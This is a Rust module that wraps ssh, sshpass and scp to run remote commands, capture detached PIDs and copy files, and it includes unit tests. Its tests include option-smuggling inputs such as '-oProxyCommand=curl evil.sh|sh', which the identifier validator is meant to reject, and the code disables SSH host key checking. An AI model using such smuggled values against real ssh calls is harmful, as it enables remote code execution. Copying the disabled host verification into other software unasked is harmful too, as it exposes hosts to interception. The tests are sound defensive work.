use anyhow::{anyhow, Result};
use log::info;
use std::path::{Path, PathBuf};
use std::process::Stdio;
use std::time::Duration;
use tokio::process::Command;
#[allow(dead_code)]
#[derive(Debug, Clone)]
pub enum SshAuth {
Key(PathBuf),
PasswordFile(PathBuf),
}
pub struct SshTarget {
host: String,
user: String,
auth: SshAuth,
}
fn is_safe_ssh_identifier(s: &str) -> bool {
if s.is_empty() || s.len() > 253 {
return false;
}
if s.starts_with('-') {
return false;
}
s.bytes()
.all(|b| b.is_ascii_alphanumeric() || b == b'.' || b == b'_' || b == b'-' || b == b':')
}
#[derive(Debug, thiserror::Error)]
pub enum SshError {
#[error("invalid ssh user '{0}' — must match [A-Za-z0-9._-]{{1,253}} and not start with '-'")]
InvalidUser(String),
#[error("invalid ssh host '{0}' — must match [A-Za-z0-9.:_-]{{1,253}} and not start with '-'")]
InvalidHost(String),
}
impl SshTarget {
pub fn new(host: String, user: String, auth: SshAuth) -> Result<Self, SshError> {
if !is_safe_ssh_identifier(&user) {
return Err(SshError::InvalidUser(user));
}
if !is_safe_ssh_identifier(&host) {
return Err(SshError::InvalidHost(host));
}
Ok(Self { host, user, auth })
}
fn ssh_options() -> Vec<&'static str> {
vec![
"-o",
"StrictHostKeyChecking=no",
"-o",
"UserKnownHostsFile=/dev/null",
"-o",
"ConnectTimeout=10",
]
}
fn ssh_password_options() -> Vec<&'static str> {
vec![
"-o",
"PreferredAuthentications=password",
"-o",
"PubkeyAuthentication=no",
]
}
fn destination(&self) -> String {
format!("{}@{}", self.user, self.host)
}
fn ssh_cmd(&self, remote_cmd: &str) -> Command {
match &self.auth {
SshAuth::Key(key_path) => {
let mut c = Command::new("ssh");
c.arg("-i")
.arg(key_path)
.args(Self::ssh_options())
.arg("--")
.arg(self.destination())
.arg(remote_cmd)
.stdout(Stdio::piped())
.stderr(Stdio::piped());
c
}
SshAuth::PasswordFile(pw_path) => {
let mut c = Command::new("sshpass");
c.arg("-f")
.arg(pw_path)
.arg("ssh")
.args(Self::ssh_options())
.args(Self::ssh_password_options())
.arg("--")
.arg(self.destination())
.arg(remote_cmd)
.stdout(Stdio::piped())
.stderr(Stdio::piped());
c
}
}
}
fn scp_cmd(&self, local: &Path, remote: &str) -> Command {
let remote_arg = format!("{}:{}", self.destination(), remote);
match &self.auth {
SshAuth::Key(key_path) => {
let mut c = Command::new("scp");
c.arg("-i")
.arg(key_path)
.args(Self::ssh_options())
.arg("--")
.arg(local)
.arg(remote_arg)
.stdout(Stdio::piped())
.stderr(Stdio::piped());
c
}
SshAuth::PasswordFile(pw_path) => {
let mut c = Command::new("sshpass");
c.arg("-f")
.arg(pw_path)
.arg("scp")
.args(Self::ssh_options())
.args(Self::ssh_password_options())
.arg("--")
.arg(local)
.arg(remote_arg)
.stdout(Stdio::piped())
.stderr(Stdio::piped());
c
}
}
}
}
pub async fn exec(target: &SshTarget, remote_cmd: &str, timeout: Duration) -> Result<String> {
use std::sync::{Arc, Mutex};
use tokio::io::AsyncReadExt;
let start = std::time::Instant::now();
let mut child = target
.ssh_cmd(remote_cmd)
.spawn()
.map_err(|e| anyhow!("SSH spawn error: {}", e))?;
let stdout = child
.stdout
.take()
.ok_or_else(|| anyhow!("no stdout pipe"))?;
let stderr = child
.stderr
.take()
.ok_or_else(|| anyhow!("no stderr pipe"))?;
let out_buf: Arc<Mutex<Vec<u8>>> = Arc::new(Mutex::new(Vec::new()));
let err_buf: Arc<Mutex<Vec<u8>>> = Arc::new(Mutex::new(Vec::new()));
let out_writer = Arc::clone(&out_buf);
let err_writer = Arc::clone(&err_buf);
let out_task = tokio::spawn(async move {
let mut s = stdout;
let mut local = Vec::new();
let _ = s.read_to_end(&mut local).await;
out_writer.lock().unwrap().extend(local);
});
let err_task = tokio::spawn(async move {
let mut s = stderr;
let mut local = Vec::new();
let _ = s.read_to_end(&mut local).await;
err_writer.lock().unwrap().extend(local);
});
let snapshot = |label: &str, buf: &Arc<Mutex<Vec<u8>>>| {
let bytes = buf.lock().unwrap().clone();
format!("{label}={:?}", String::from_utf8_lossy(&bytes))
};
match tokio::time::timeout(timeout, child.wait()).await {
Ok(Ok(status)) => {
let _ = tokio::time::timeout(Duration::from_secs(1), async {
let _ = out_task.await;
let _ = err_task.await;
})
.await;
let out = String::from_utf8_lossy(&out_buf.lock().unwrap()).to_string();
if !status.success() {
let err = String::from_utf8_lossy(&err_buf.lock().unwrap()).to_string();
return Err(anyhow!(
"SSH exec failed (status={}, elapsed={}ms): stderr={}",
status,
start.elapsed().as_millis(),
err
));
}
Ok(out)
}
Ok(Err(e)) => Err(anyhow!("SSH wait error: {}", e)),
Err(_) => {
let _ = child.kill().await;
let _ = tokio::time::timeout(Duration::from_millis(500), async {
let _ = out_task.await;
let _ = err_task.await;
})
.await;
Err(anyhow!(
"SSH exec timed out after {:?} (elapsed={}ms); partial {}; partial {}",
timeout,
start.elapsed().as_millis(),
snapshot("stdout", &out_buf),
snapshot("stderr", &err_buf),
))
}
}
}
#[derive(Debug, Clone)]
pub struct DetachedOk {
pub pid: u32,
pub elapsed_ms: u128,
#[allow(dead_code)]
pub stdout: String,
#[allow(dead_code)]
pub stderr: String,
}
#[derive(Debug, Clone)]
pub struct DetachedErr {
pub message: String,
pub elapsed_ms: u128,
pub partial_stdout: String,
pub partial_stderr: String,
}
impl std::fmt::Display for DetachedErr {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.write_str(&self.message)
}
}
fn parse_pid_line(line: &str) -> Option<u32> {
line.trim().parse::<u32>().ok()
}
pub async fn exec_detached_get_pid(
target: &SshTarget,
remote_cmd: &str,
timeout: Duration,
) -> std::result::Result<DetachedOk, DetachedErr> {
use std::sync::{Arc, Mutex};
use tokio::io::{AsyncBufReadExt, BufReader};
use tokio::sync::oneshot;
let start = std::time::Instant::now();
let mut child = match target.ssh_cmd(remote_cmd).spawn() {
Ok(c) => c,
Err(e) => {
return Err(DetachedErr {
message: format!("SSH spawn error: {e}"),
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: String::new(),
});
}
};
let stdout = match child.stdout.take() {
Some(s) => s,
None => {
return Err(DetachedErr {
message: "no stdout pipe".into(),
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: String::new(),
});
}
};
let stderr = match child.stderr.take() {
Some(s) => s,
None => {
return Err(DetachedErr {
message: "no stderr pipe".into(),
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: String::new(),
});
}
};
let err_buf: Arc<Mutex<Vec<u8>>> = Arc::new(Mutex::new(Vec::new()));
let err_writer = Arc::clone(&err_buf);
let err_task = tokio::spawn(async move {
use tokio::io::AsyncReadExt;
let mut s = stderr;
let mut local = Vec::new();
let _ = s.read_to_end(&mut local).await;
err_writer.lock().unwrap().extend(local);
});
let (tx, rx) = oneshot::channel::<std::result::Result<(u32, String), String>>();
let stdout_task = tokio::spawn(async move {
let mut reader = BufReader::new(stdout);
let mut accumulated = String::new();
let mut line = String::new();
loop {
line.clear();
match reader.read_line(&mut line).await {
Ok(0) => {
let _ = tx.send(Err(format!("EOF before PID line; got: {accumulated:?}")));
return;
}
Ok(_) => {
accumulated.push_str(&line);
if let Some(pid) = parse_pid_line(&line) {
let _ = tx.send(Ok((pid, accumulated.clone())));
return;
}
}
Err(e) => {
let _ = tx.send(Err(format!("stdout read error: {e}")));
return;
}
}
}
});
let outcome = tokio::time::timeout(timeout, rx).await;
let stderr_snapshot = || String::from_utf8_lossy(&err_buf.lock().unwrap()).to_string();
match outcome {
Ok(Ok(Ok((pid, accumulated)))) => {
let _ = child.start_kill();
let _ = child.wait().await;
stdout_task.abort();
let _ = err_task.await;
Ok(DetachedOk {
pid,
elapsed_ms: start.elapsed().as_millis(),
stdout: accumulated,
stderr: stderr_snapshot(),
})
}
Ok(Ok(Err(msg))) => {
let _ = child.kill().await;
stdout_task.abort();
let _ = err_task.await;
Err(DetachedErr {
message: msg,
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: stderr_snapshot(),
})
}
Ok(Err(_)) => {
let _ = child.kill().await;
stdout_task.abort();
let _ = err_task.await;
Err(DetachedErr {
message: "stdout reader task ended unexpectedly".into(),
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: stderr_snapshot(),
})
}
Err(_) => {
let _ = child.kill().await;
stdout_task.abort();
let _ = err_task.await;
Err(DetachedErr {
message: format!("detached exec timed out after {timeout:?}"),
elapsed_ms: start.elapsed().as_millis(),
partial_stdout: String::new(),
partial_stderr: stderr_snapshot(),
})
}
}
}
pub async fn test_connection(target: &SshTarget) -> Result<()> {
exec(target, "echo SSH-OK", Duration::from_secs(30)).await?;
Ok(())
}
pub async fn copy_file(target: &SshTarget, local: &Path, remote: &str) -> Result<()> {
let output = tokio::time::timeout(
Duration::from_secs(60),
target.scp_cmd(local, remote).output(),
)
.await
.map_err(|_| anyhow!("SCP transfer timed out after 60s"))?
.map_err(|e| anyhow!("SCP spawn error: {}", e))?;
if !output.status.success() {
return Err(anyhow!(
"SCP failed: {}",
String::from_utf8_lossy(&output.stderr)
));
}
info!(
"✔ SCP transferred {:?} -> {}:{}",
local,
target.destination(),
remote
);
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn parse_pid_line_accepts_plain_digits() {
assert_eq!(parse_pid_line("18066"), Some(18066));
}
#[test]
fn parse_pid_line_trims_trailing_newline() {
assert_eq!(parse_pid_line("18066\n"), Some(18066));
}
#[test]
fn parse_pid_line_trims_surrounding_whitespace() {
assert_eq!(parse_pid_line(" 18066 \r\n"), Some(18066));
}
#[test]
fn parse_pid_line_rejects_non_digits() {
for s in [
"Permanently added '10.0.0.1' (ED25519)",
"",
" ",
"12abc",
"abc",
"12.3",
] {
assert!(
parse_pid_line(s).is_none(),
"parse_pid_line wrongly accepted: {s:?}"
);
}
}
#[test]
fn parse_pid_line_rejects_overflow() {
assert!(parse_pid_line("4294967296").is_none());
}
#[test]
fn safe_identifier_accepts_normal_usernames_and_hosts() {
for s in [
"runner",
"ubuntu",
"cirun-runner",
"10.0.0.1",
"host.example.com",
"::1",
] {
assert!(is_safe_ssh_identifier(s), "rejected legitimate value: {s}");
}
}
#[test]
fn safe_identifier_rejects_option_smuggling() {
for s in ["-oProxyCommand=curl evil.sh|sh", "-i/tmp/evil", "-", "--"] {
assert!(!is_safe_ssh_identifier(s), "leading-dash accepted: {s}");
}
}
#[test]
fn safe_identifier_rejects_shell_metachars_and_whitespace() {
for s in ["a b", "a;b", "a|b", "a$b", "a`b`", "a\nb", "a/b", "a\"b"] {
assert!(!is_safe_ssh_identifier(s), "metachar accepted: {s:?}");
}
}
#[test]
fn safe_identifier_rejects_empty_and_overlong() {
assert!(!is_safe_ssh_identifier(""));
assert!(!is_safe_ssh_identifier(&"a".repeat(254)));
}
#[test]
fn ssh_target_new_rejects_option_smuggling_user() {
let r = SshTarget::new(
"10.0.0.1".into(),
"-oProxyCommand=curl evil|sh".into(),
SshAuth::Key(PathBuf::from("/tmp/k")),
);
assert!(matches!(r, Err(SshError::InvalidUser(_))));
}
#[test]
fn ssh_target_new_rejects_option_smuggling_host() {
let r = SshTarget::new(
"-oProxyCommand=evil".into(),
"runner".into(),
SshAuth::Key(PathBuf::from("/tmp/k")),
);
assert!(matches!(r, Err(SshError::InvalidHost(_))));
}
#[test]
fn ssh_target_new_accepts_valid() {
let r = SshTarget::new(
"10.0.0.1".into(),
"runner".into(),
SshAuth::Key(PathBuf::from("/tmp/k")),
);
assert!(r.is_ok());
}
}